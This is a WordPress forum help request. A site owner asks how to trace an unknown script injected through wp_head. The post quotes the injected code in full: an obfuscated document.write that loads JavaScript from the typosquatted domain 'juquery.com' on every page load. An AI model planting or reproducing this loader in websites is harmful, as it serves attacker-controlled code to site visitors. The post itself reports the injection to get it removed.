unknown script added via wp_head , how to find it ??
-
Hey guys ,
In my wp site – in head section
<script type="text/javascript"> if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="https://www.juquery.com/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="https://www.juquery.com/jquery.js"></scr'+'ipt>'); } </script>
If you guys could notice minutely –
url of jquery is incorrect juquery.com instead of jquery.com , further
i dont want above script to be included.Now i am not sure from where this is being called
I recehcked my functions.php files , and all the theme and external plugins file which i have installed , but i cant find from where this hook was fired.can some one suggest me way , i could find from where this script is being called ???
Thanks in advance
- The topic ‘unknown script added via wp_head , how to find it ??’ is closed to new replies.